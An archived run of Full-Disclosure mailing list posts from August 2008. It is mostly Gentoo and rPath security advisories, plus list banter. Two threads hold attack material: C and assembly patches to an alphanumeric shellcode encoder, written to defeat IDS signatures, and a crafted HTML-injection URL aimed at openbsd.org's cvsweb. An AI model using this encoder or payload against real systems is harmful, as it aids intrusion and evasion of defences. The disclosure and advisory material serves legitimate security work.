>> for >> intercepting communications), except that there's the nasty clause >> "knowing or >> having reason to know that the design of such device renders it primarily >> useful for the purpose of the surreptitious interception of wire, oral, or >> electronic communications;" - and you'd fail on the "primarily" because >> there's >> lots of *other* uses for Metasploit. >> >> He *is* probably in violation of 36 USC 117, 7 USC 411b, and 26 USC >> 7523(a)(1), >> however. >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > From ureleet at gmail.com Wed Aug 6 01:26:15 2008 From: ureleet at gmail.com (Ureleet) Date: Tue, 5 Aug 2008 20:26:15 -0400 Subject: [Full-disclosure] (no subject) In-Reply-To: <1217974979.8503.16.camel@b4byl0n> References: <1217974979.8503.16.camel@b4byl0n> Message-ID: <6158bb410808051726rc92d72bi89f4f82ea35eeb4e@mail.gmail.com> does that research involve you using a subject line in ur emails? On Tue, Aug 5, 2008 at 6:22 PM, Bernhard Mueller wrote: > Hello, > > We recently decided to release some of our research to the public, so > selected presentations from our internal tech meetings will from now on > be available for download at SEC Consult website. The presentations > (some of which are in german) will include everything from general > howtos to highly specialized pentesting-stuff. > We will also release a whitepaper on a variant of the new DNS poisoning > attack tomorrow. We wrote this whitepaper along with an exploit a while > ago, and somehow managed NOT to leak it to the press before the Kaminsky > talk :) > The presentations and whitepapers, along with our past presentations > from Blackhat and Deepsec, can be found at: > > > http://www.sec-consult.com/publikationen_e.html > > > Here are some links to what is already online: > > > * A german guide to WEP/WPA cracking, by Johannes Greil: > > > http://www.sec-consult.com/files/Wireless_LAN_attacks_wo_fancy_style.pdf > > * A presentation on the method of using DLL injection to interface to an > SSL connection used by a running process (I used this for > blackbox-testing certain binary SSL client/server applications): > > http://www.sec-consult.com/files/SSL_Packet_Injection_BMU.pdf > > * A short presentation on a method of error-based SQL injection in > Sybase databases, by Thomas Kerbl: > > http://www.sec-consult.com/files/Sybase_ModSecurity_Evasion_TKE.pdf > > > I hope that some of you will find this useful. > > > Regards, > > Bernhard (Certified Internet Security Superstar) > > -- > _________________________________________ > > Bernhard Mueller > Security Consultant > > SEC Consult Unternehmensberatung GmbH > www.sec-consult.com > > A-1190 Vienna, Mooslackengasse 17 > phone +43 1 8903043 34 > fax +43 1 8903043 15 > mobile +43 676 840301 718 > email b.mueller at sec-consult.com > > Firmenbuch Wiener Neustadt: 227896t, UID: ATU56165223 > Firmensitz: Prof. Dr. Stephan Korenstra?e 10, A-2700 Wiener Neustadt > > Advisor for your information security. > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ From rbu at gentoo.org Wed Aug 6 01:30:01 2008 From: rbu at gentoo.org (Robert Buchholz) Date: Wed, 6 Aug 2008 02:30:01 +0200 Subject: [Full-disclosure] [ GLSA 200808-02 ] Net-SNMP: Multiple vulnerabilities Message-ID: <200808060230.05828.rbu@gentoo.org> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200808-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Net-SNMP: Multiple vulnerabilities Date: August 06, 2008 Bugs: #222265, #225105 ID: 200808-02 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities in Net-SNMP allow for authentication bypass in snmpd and execution of arbitrary code in Perl applications using Net-SMNP. Background ========== Net-SNMP is a collection of tools for generating and retrieving SNMP data. The SNMPv3 protocol uses a keyed-Hash Message Authentication Code (HMAC) to verify data integrity and authenticity of SNMP messages. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-analyzer/net-snmp < 5.4.1.1 >= 5.4.1.1 Description =========== Wes Hardaker reported that the SNMPv3 HMAC verification relies on the client to specify the HMAC length (CVE-2008-0960). John Kortink reported a buffer overflow in the Perl bindings of Net-SNMP when processing the OCTETSTRING in an attribute value pair (AVP) received by an SNMP agent (CVE-2008-2292). Impact ====== An attacker could send SNMPv3 packets to an instance of snmpd providing a valid user name and an HMAC length value of 1, and easily conduct brute-force attacks to bypass SNMP authentication. An attacker could further entice a user to connect to a malicious SNMP agent with an SNMP client using the Perl bindings, possibly resulting in the execution of arbitrary code. Workaround ========== There is no known workaround at this time. Resolution ========== All Net-SNMP users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-analyzer/net-snmp-5.4.1.1" References ========== [ 1 ] CVE-2008-0960 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0960 [ 2 ] CVE-2008-2292 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2292 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200808-02.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 835 bytes Desc: This is a digitally signed message part. Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080806/4d28fec4/attachment.bin From rbu at gentoo.org Wed Aug 6 01:42:21 2008 From: rbu at gentoo.org (Robert Buchholz) Date: Wed, 6 Aug 2008 02:42:21 +0200 Subject: [Full-disclosure] [ GLSA 200808-03 ] Mozilla products: Multiple vulnerabilities Message-ID: <200808060242.25071.rbu@gentoo.org> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200808-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Mozilla products: Multiple vulnerabilities Date: August 06, 2008 Bugs: #204337, #218065, #230567, #231975 ID: 200808-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been reported in Mozilla Firefox, Thunderbird, SeaMonkey and XULRunner, some of which may allow user-assisted execution of arbitrary code. Background ========== Mozilla Firefox is an open-source web browser and Mozilla Thunderbird an open-source email client, both from the Mozilla Project. The SeaMonkey project is a community effort to deliver production-quality releases of code derived from the application formerly known as the 'Mozilla Application Suite'. XULRunner is a Mozilla runtime package that can be used to bootstrap XUL+XPCOM applications like Firefox and Thunderbird. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 mozilla-firefox < 2.0.0.16 >= 2.0.0.16 2 mozilla-firefox-bin < 2.0.0.16 >= 2.0.0.16 3 mozilla-thunderbird < 2.0.0.16 >= 2.0.0.16 4 mozilla-thunderbird-bin < 2.0.0.16 >= 2.0.0.16 5 seamonkey < 1.1.11 >= 1.1.11 6 seamonkey-bin < 1.1.11 >= 1.1.11 7 xulrunner < 1.8.1.16 >= 1.8.1.16 8 xulrunner-bin < 1.8.1.16 >= 1.8.1.16 ------------------------------------------------------------------- 8 affected packages on all of their supported architectures. ------------------------------------------------------------------- Description =========== The following vulnerabilities were reported in all mentioned Mozilla products: * TippingPoint's Zero Day Initiative reported that an incorrect integer data type is used as a CSS object reference counter, leading to a counter overflow and a free() of in-use memory (CVE-2008-2785). * Igor Bukanov, Jesse Ruderman and Gary Kwong reported crashes in the JavaScript engine, possibly triggering memory corruption (CVE-2008-2799). * Devon Hubbard, Jesse Ruderman, and Martijn Wargers reported crashes in the layout engine, possibly triggering memory corruption (CVE-2008-2798). * moz_bug_r_a4 reported that XUL documents that include a script from a chrome: URI that points to a fastload file would be executed with the privileges specified in the file (CVE-2008-2802). * moz_bug_r_a4 reported that the mozIJSSubScriptLoader.LoadScript() function only apply XPCNativeWrappers to scripts loaded from standard "chrome:" URIs, which could be the case in third-party add-ons (CVE-2008-2803). * Astabis reported a crash in the block reflow implementation related to large images (CVE-2008-2811). * John G. Myers, Frank Benkstein and Nils Toedtmann reported a weakness in the trust model used by Mozilla, that when a user accepts an SSL server certificate on the basis of the CN domain name in the DN field, the certificate is also regarded as accepted for all domain names in subjectAltName:dNSName fields (CVE-2008-2809). The following vulnerabilities were reported in Firefox, SeaMonkey and XULRunner: * moz_bug_r_a4 reported that the Same Origin Policy is not properly enforced on JavaScript (CVE-2008-2800). * Collin Jackson and Adam Barth reported that JAR signing is not properly implemented, allowing injection of JavaScript into documents within a JAR archive (CVE-2008-2801). * Opera Software reported an error allowing for arbitrary local file upload (CVE-2008-2805). * Daniel Glazman reported that an invalid .properties file for an add-on might lead to the usage of uninitialized memory (CVE-2008-2807). * Masahiro Yamada reported that HTML in "file://" URLs in directory listings is not properly escaped (CVE-2008-2808). * Geoff reported that the context of Windows Internet shortcut files is not correctly identified (CVE-2008-2810). * The crash vulnerability (CVE-2008-1380) that was previously announced in GLSA 200805-18 is now also also resolved in Seamonkey binary ebuilds. The following vulnerability was reported in Firefox only: * Billy Rios reported that the Pipe character in a command-line URI is identified as a request to open multiple tabs, allowing to open "chrome" and "file" URIs (CVE-2008-2933). Impact ====== A remote attacker could entice a user to view a specially crafted web page or email that will trigger one of the vulnerabilities, possibly leading to the execution of arbitrary code or a Denial of Service. It is also possible for an attacker to trick a user to upload arbitrary files or to accept an invalid certificate for a spoofed web site, to read uninitialized memory, to violate Same Origin Policy, or to conduct Cross-Site Scripting attacks. Workaround ========== There is no known workaround at this time. Resolution ========== All Mozilla Firefox users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=www-client/mozilla-firefox-2.0.0.16" All Mozilla Firefox binary users should upgrade to the latest version: # emerge --sync # emerge --ask -1 -v ">=www-client/mozilla-firefox-bin-2.0.0.16" All Mozilla Thunderbird users should upgrade to the latest version: # emerge --sync # emerge --ask -1 -v ">=mail-client/mozilla-thunderbird-2.0.0.16" All Mozilla Thunderbird binary users should upgrade to the latest version: # emerge --sync # emerge -a -1 -v ">=mail-client/mozilla-thunderbird-bin-2.0.0.16" All Seamonkey users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-client/seamonkey-1.1.11" All Seamonkey binary users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=www-client/seamonkey-bin-1.1.11" All XULRunner users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-libs/xulrunner-1.8.1.16" All XULRunner binary users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot -v ">=net-libs/xulrunner-bin-1.8.1.16" References ========== [ 1 ] CVE-2008-1380 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1380 [ 2 ] CVE-2008-2785 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2785 [ 3 ] CVE-2008-2798 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2798 [ 4 ] CVE-2008-2799 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2799 [ 5 ] CVE-2008-2800 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2800 [ 6 ] CVE-2008-2801 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2801 [ 7 ] CVE-2008-2802 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2802 [ 8 ] CVE-2008-2803 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2803 [ 9 ] CVE-2008-2805 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2805 [ 10 ] CVE-2008-2807 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2807 [ 11 ] CVE-2008-2808 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2808 [ 12 ] CVE-2008-2809 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2809 [ 13 ] CVE-2008-2810 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2810 [ 14 ] CVE-2008-2811 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2811 [ 15 ] CVE-2008-2933 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2933 [ 16 ] GLSA 200805-18 http://www.gentoo.org/security/en/glsa/glsa-200805-18.xml Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200808-03.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 835 bytes Desc: This is a digitally signed message part. Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080806/b11053a2/attachment.bin From rbu at gentoo.org Wed Aug 6 01:46:00 2008 From: rbu at gentoo.org (Robert Buchholz) Date: Wed, 6 Aug 2008 02:46:00 +0200 Subject: [Full-disclosure] [ GLSA 200808-04 ] Wireshark: Denial of Service Message-ID: <200808060246.03789.rbu@gentoo.org> - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200808-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Wireshark: Denial of Service Date: August 06, 2008 Bugs: #230411, #231587 ID: 200808-04 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple Denial of Service vulnerabilities have been discovered in Wireshark. Background ========== Wireshark is a network protocol analyzer with a graphical front-end. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-analyzer/wireshark < 1.0.2 >= 1.0.2 Description =========== Multiple vulnerabilities related to memory management were discovered in the GSM SMS dissector (CVE-2008-3137), the PANA and KISMET dissectors (CVE-2008-3138), the RTMPT dissector (CVE-2008-3139), the syslog dissector (CVE-2008-3140) and the RMI dissector (CVE-2008-3141) and when reassembling fragmented packets (CVE-2008-3145). Impact ====== A remote attacker could exploit these vulnerabilities by sending a specially crafted packet on a network being monitored by Wireshark or enticing a user to read a malformed packet trace file, causing a Denial of Service. Workaround ========== There is no known workaround at this time. Resolution ========== All Wireshark users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-analyzer/wireshark-1.0.2" References ========== [ 1 ] CVE-2008-3137 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3137 [ 2 ] CVE-2008-3138 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3138 [ 3 ] CVE-2008-3139 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3139 [ 4 ] CVE-2008-3140 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3140 [ 5 ] CVE-2008-3141 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3141 [ 6 ] CVE-2008-3145 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3145 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200808-04.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org. License ======= Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 835 bytes Desc: This is a digitally signed message part. Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080806/c25f9f79/attachment.bin From research at sec-consult.com Wed Aug 6 02:28:39 2008 From: research at sec-consult.com (Bernhard Mueller) Date: Wed, 6 Aug 2008 03:28:39 +0200 Subject: [Full-disclosure] (no subject) In-Reply-To: <6158bb410808051726rc92d72bi89f4f82ea35eeb4e@mail.gmail.com> References: <1217974979.8503.16.camel@b4byl0n> <6158bb410808051726rc92d72bi89f4f82ea35eeb4e@mail.gmail.com> Message-ID: <1217986119.4062.2.camel@b4byl0n> On Wed, 2008-08-06 at 02:26 +0200, Ureleet wrote: > does that research involve you using a subject line in ur emails? No, I left it out intentionally to provoke one of your useless posts. "When n3td3v does a pushup, he isn't lifting himself up, he's pushing the Earth down!" -- _________________________________________ Bernhard Mueller Security Consultant SEC Consult Unternehmensberatung GmbH www.sec-consult.com A-1190 Vienna, Mooslackengasse 17 phone +43 1 8903043 34 fax +43 1 8903043 15 mobile +43 676 840301 718 email b.mueller at sec-consult.com Firmenbuch Wiener Neustadt: 227896t, UID: ATU56165223 Firmensitz: Prof. Dr. Stephan Korenstra?e 10, A-2700 Wiener Neustadt Advisor for your information security. From avri.schneider at gmail.com Wed Aug 6 07:06:34 2008 From: avri.schneider at gmail.com (Avraham Schneider) Date: Wed, 6 Aug 2008 09:06:34 +0300 Subject: [Full-disclosure] Alphanumeric Shellcode Encoding and Detection In-Reply-To: References: <6C653A611ACD78469EA1DF7954A51ED1042338C6@extlv102.eAladdin.org> Message-ID: While my post awaits moderator approval (over 100KB) - I thought I'd share with you a fix: Basically what I do now is this: ebx needs to point to address of the decoder+1 and edx and ecx need to point to the address of the decoder Since we added 2 bytes to the head of the decoder, I need to increment ebx, ecx, and edx by 2 to reserve the same functionality. I do this by utilizing one of the unused push instructions to the stack (for an unused register) and replace it with an inc ecx just before ecx is pushed to the stack, for setting the ebx register on a popad - ecx at that point holds the address of the decoder + 2 So now I don't need to increment ebx before the start of the decoder loop - and I can use that instruction to increment edx or ecx And since I don't need the inc edi either, I can also use it to inc ecx or edx. I can also push ecx (containing the address of the decoder) to the stack before the push for setting the ecx register on the popad - since ecx eas not a needed register before, (I set it within the decoder head from edx), I randomized the corresponding push register instruction, not anymore - now I push ecx, and it holds the address of the decoder, which would increment by 2 as described above. So to summerize: I have 4 instructions in the decoder head I can play with (as I don't need to push ecx;pop eax;inc ebx;inc edi) - I use them to increment ecx and edx by 2 I replace one of the push instructions for the popad (this affects eax, it will now contain the first 4 bytes of the decoder head, which we don't care about) - with an inc ecx - this is used to increment ebx once (by incrementing ecx before the push for setting the ebx register). .Here's the code: Add this to the if(p_state[3]){} block - after all the previous checks... (i.e. at the end of the block) - make sure to change p_state[] allocation to support the extra states - i.e. change to UCHAR *p_state[9]; and memset(p_state, 0, sizeof(UCHAR*)*9); if(Q(REGISTER_WITH_ADDRESS_OF_SHELLCODE)=="esp") {//.*[8A].*[8A].*[56].*[56] p_state[5] = memchr(p_state[0], 5, 11-(p_state[0]-random_states)); p_state[6] = memchr(p_state[0], 6, 11-(p_state[0]-random_states)); p_state[7] = memchr(p_state[0], 8, 11-(p_state[0]-random_states)); p_state[8] = memchr(p_state[0], 10, 11-(p_state[0]-random_states)); if(p_state[5] < p_state[7] || p_state[5] < p_state[8] || p_state[6] < p_state[7] || p_state[6] < p_state[8] ) p_state[4] = 0; } Change to the following: instructions[7][0] = Q(REGISTER_WITH_ADDRESS_OF_SHELLCODE)=="esp"?'\x41':'\x52'; //R instructions[8][0] = Q(REGISTER_WITH_ADDRESS_OF_SHELLCODE)=="esp"?'\x42':'\x59'; //Y instructions[9][0] = Q(REGISTER_WITH_ADDRESS_OF_SHELLCODE)=="esp"?'\x41':'\x47'; //G instructions[10][0] = Q(REGISTER_WITH_ADDRESS_OF_SHELLCODE)=="esp"?'\x42':'\x43'; //C strcat(instruction_comments[7], Q(REGISTER_WITH_ADDRESS_OF_SHELLCODE)=="esp"?"inc ecx":"push edx"); strcat(instruction_comments[8], Q(REGISTER_WITH_ADDRESS_OF_SHELLCODE)=="esp"?"inc edx":"pop ecx"); strcat(instruction_comments[9], Q(REGISTER_WITH_ADDRESS_OF_SHELLCODE)=="esp"?"inc ecx":"inc edi"); strcat(instruction_comments[10], Q(REGISTER_WITH_ADDRESS_OF_SHELLCODE)=="esp"?"inc edx":"inc ebx"); Place the following before printing the decoder to stdout (instead of the previous fix): //bugfix: handle case of esp pointing to shellcode if (!strcmp(Q(REGISTER_WITH_ADDRESS_OF_SHELLCODE), "esp")) { /* _asm { push esp pop ecx push ecx push ecx inc ecx //since the stack is messed up here, eax results in push ecx //being equal to the first 4 bytes of the decoder } and we also 'fix' the decoder head accordingly */ p_alnum_shellcode = malloc(strlen(alnum_shellcode)+1+2); memset(p_alnum_shellcode, 0, strlen(alnum_shellcode)+1+2); memcpy(p_alnum_shellcode+2, alnum_shellcode, strlen(alnum_shellcode)+1); p_alnum_shellcode[0] = 'T'; p_alnum_shellcode[1] = 'Y'; p_alnum_shellcode[2] = 'Q'; p_alnum_shellcode[3] = get_push_register_instruction("ecx"); p_alnum_shellcode[4] = 'A'; p_alnum_shellcode[5] = get_push_register_instruction("ecx"); } On Wed, Aug 6, 2008 at 2:36 AM, Avraham Schneider wrote: > On Tue, Aug 5, 2008 at 11:31 PM, Avraham Schneider > wrote: >> Oops - that is not correct - it will only work when the second and >> third bits of ESP are 0 >> >> :-) I was to quick on the send button. >> >> EAX is basically XOR's with the length of the string, and instead I >> need to increment it by the length of the string... I'll have to come >> up with a better solution... (I'll probably have to resort to >> patching... but I was looking for a quick and dirty fix) >> >> If anyone comes up with a solution for this before me, I'll buy them a >> Shawarma next time they're in Israel ;-) >> >> Regards, >> Avri >> >> On Tue, Aug 5, 2008 at 7:00 PM, Avraham Moshe Schneider >> wrote: >>> I fixed a couple of bugs - >>> >>> 1. The srand() function was called after calls to rand() - causing a fixed string in the decoder which an IDS could signature on >>> 2. Case of ESP register pointing to the head of the decoder was not handled, it is fixed now, but needs to be randomized. Right now, in the case of ESP pointing to the shellcode, the following fixed string would exist at the head of the decoder routine: "TX4640" >>> This translates to: >>> _asm >>> { >>> push esp; >>> pop eax; >>> xor al, 0x36; >>> xor al, 0x30; >>> } >>> >>> The '6' and the '0' can be any alphanumeric byte where the first is the second+6 or vice versa. >>> >>> You may add alphanumeric NOP instructions in between and change the diff between the bytes accordingly. >>> The diff between the two XOR values should be the length of the resulting string. >>> >>> I used the EAX register, as XOR'ing it with an immediate value is alphanumeric. >>> >>> Regards, >>> Avri >>> ********************************************************************************************** >>> >>> The contents of this email and any attachments are confidential. >>> It is intended for the named recipient(s) only. >>> If you have received this email in error please notify the system manager or the >>> sender immediately and do not disclose the contents to anyone or make copies. >>> ** eSafe scanned this email for viruses, vandals and malicious content ** >>> >>> ********************************************************************************************** >>> >>> _______________________________________________ >>> Full-Disclosure - We believe in it. >>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >>> Hosted and sponsored by Secunia - http://secunia.com/ >>> >> > From david.jonass at googlemail.com Tue Aug 5 14:29:47 2008 From: david.jonass at googlemail.com (r0tten c0re) Date: Tue, 5 Aug 2008 15:29:47 +0200 Subject: [Full-disclosure] McAfee + FUD ? Message-ID: <286399310808050629k128b7e97pe30d838f798336aa@mail.gmail.com> Hi all, Seems like McAfee choose to counter FUD by more FUD which triggered this : http://www.nruns.com/_downloads/PR-08-02_Reaction_to_McAfee_statement.pdf I have been aware of the ongoing AV insecurity catastrophe but not read about this mcafee<->nruns discussion. Anyways a good read. "n.runs welcomes the AV-Industry SDL (Secure Development Lifecycle) effort spearheaded by McAfee. While we greatly support the introduction of an SDL, it will not entirely extinguish flaws with security relevance. Although it has the potential of greatly reducing their number and impact, it will not lead to invulnerable software. In order to reach this goal, we consider it necessary to reduce the amount of trusted code to an absolute minimum, reduce the attack surface to an absolute minimum and place all untrusted code into a strictly confined environment. This way no matter how badly the code behaves, and no matter how many vulnerabilities it has, it cannot violate the security requirements." Regards, David From manuchauuu at googlemail.com Wed Aug 6 11:25:33 2008 From: manuchauuu at googlemail.com (Manu Chao) Date: Wed, 6 Aug 2008 07:25:33 -0300 Subject: [Full-disclosure] Check this out Message-ID: <6142b9ef0808060325q178f76baka9974a50a9207938@mail.gmail.com> http://www.openbsd.org/cgi-bin/cvsweb/src/?sortby=%22%3E%3Ch1%20style=%22position:absolute;top:10px;font-size:72pt%22%3E%3Cblink%3EOnly%202%20Remote%20bugs%3C/blink%3E%3C/h1%3E Chauuuuu! -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080806/93dbea79/attachment.html From avri.schneider at gmail.com Wed Aug 6 00:36:38 2008 From: avri.schneider at gmail.com (Avraham Schneider) Date: Wed, 6 Aug 2008 02:36:38 +0300 Subject: [Full-disclosure] Alphanumeric Shellcode Encoding and Detection In-Reply-To: References: <6C653A611ACD78469EA1DF7954A51ED1042338C6@extlv102.eAladdin.org> Message-ID: On Tue, Aug 5, 2008 at 11:31 PM, Avraham Schneider wrote: > Oops - that is not correct - it will only work when the second and > third bits of ESP are 0 > > :-) I was to quick on the send button. > > EAX is basically XOR's with the length of the string, and instead I > need to increment it by the length of the string... I'll have to come > up with a better solution... (I'll probably have to resort to > patching... but I was looking for a quick and dirty fix) > > If anyone comes up with a solution for this before me, I'll buy them a > Shawarma next time they're in Israel ;-) > > Regards, > Avri > > On Tue, Aug 5, 2008 at 7:00 PM, Avraham Moshe Schneider > wrote: >> I fixed a couple of bugs - >> >> 1. The srand() function was called after calls to rand() - causing a fixed string in the decoder which an IDS could signature on >> 2. Case of ESP register pointing to the head of the decoder was not handled, it is fixed now, but needs to be randomized. Right now, in the case of ESP pointing to the shellcode, the following fixed string would exist at the head of the decoder routine: "TX4640" >> This translates to: >> _asm >> { >> push esp; >> pop eax; >> xor al, 0x36; >> xor al, 0x30; >> } >> >> The '6' and the '0' can be any alphanumeric byte where the first is the second+6 or vice versa. >> >> You may add alphanumeric NOP instructions in between and change the diff between the bytes accordingly. >> The diff between the two XOR values should be the length of the resulting string. >> >> I used the EAX register, as XOR'ing it with an immediate value is alphanumeric. >> >> Regards, >> Avri >> ********************************************************************************************** >> >> The contents of this email and any attachments are confidential. >> It is intended for the named recipient(s) only. >> If you have received this email in error please notify the system manager or the >> sender immediately and do not disclose the contents to anyone or make copies. >> ** eSafe scanned this email for viruses, vandals and malicious content ** >> >> ********************************************************************************************** >> >> _______________________________________________ >> Full-Disclosure - We believe in it. >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html >> Hosted and sponsored by Secunia - http://secunia.com/ >> > -------------- next part -------------- An embedded and charset-unspecified text was scrubbed... Name: alnum_decoder_encoder.c Url: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20080806/fa59e31d/attachment.c From announce-noreply at rpath.com Wed Aug 6 01:48:11 2008 From: announce-noreply at rpath.com (rPath Update Announcements) Date: Tue, 05 Aug 2008 20:48:11 -0400 Subject: [Full-disclosure] rPSA-2008-0245-1 cups Message-ID: <4898f4cb.6FIryIYnQ6b3AKET%announce-noreply@rpath.com> rPath Security Advisory: 2008-0245-1 Published: 2008-08-05 Products: rPath Linux 1 Rating: Severe Exposure Level Classification: Remote Root Deterministic Unauthorized Access Updated Versions: cups=conary.rpath.com at rpl:1/1.1.23-14.8-1 rPath Issue Tracking System: https://issues.rpath.com/browse/RPL-2390 References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1374 Description: Previous versions of the cups package are vulnerable to an Arbitrary Code Execution attack in which an attacker may use a maliciously crafted PDF file to trigger an integer overflow on 64-bit platforms. http://wiki.rpath.com/Advisories:rPSA-2008-0245 Copyright 2008 rPath, Inc. This file is distributed under the terms of the MIT License. A copy is available at http://www.rpath.com/permanent/mit-license.html From announce-noreply at rpath.com Wed Aug 6 01:52:00 2008 From: announce-noreply at rpath.com (rPath Update Announcements) Date: Tue, 05 Aug 2008 20:52:00 -0400 Subject: [Full-disclosure] rPSA-2008-0246-1 gaim Message-ID: <4898f5b0.nU4M7mcTNCCGe9SQ%announce-noreply@rpath.com> rPath Security Advisory: 2008-0246-1 Published: 2008-08-05 Products: rPath Linux 1 Rating: Minor Exposure Level Classification: Indirect User Deterministic Unauthorized Access Updated Versions: gaim=conary.rpath.com at rpl:1/1.5.0-4.3-1 rPath Issue Tracking System: https://issues.rpath.com/browse/RPL-2647 References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2927 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2956 Description: Previous versions of the gaim package are vulnerable to multiple attacks, the most serious of which may allow a remote attacker to exploit the MSN protocol handler and thus execute arbitrary code as the user running gaim. http://wiki.rpath.com/Advisories:rPSA-2008-0246 Copyright 2008 rPath, Inc. This file is distributed under the terms of the MIT License. A copy is available at http://www.rpath.com/permanent/mit-license.html From trejrco at gmail.com Wed Aug 6 12:56:50 2008 From: trejrco at gmail.com (TJ) Date: Wed, 6 Aug 2008 07:56:50 -0400 Subject: [Full-disclosure] Kaminsky's Law In-Reply-To: <6158bb410808051725o6edd6ce2x3414eb0ee45b8485@mail.gmail.com> References: 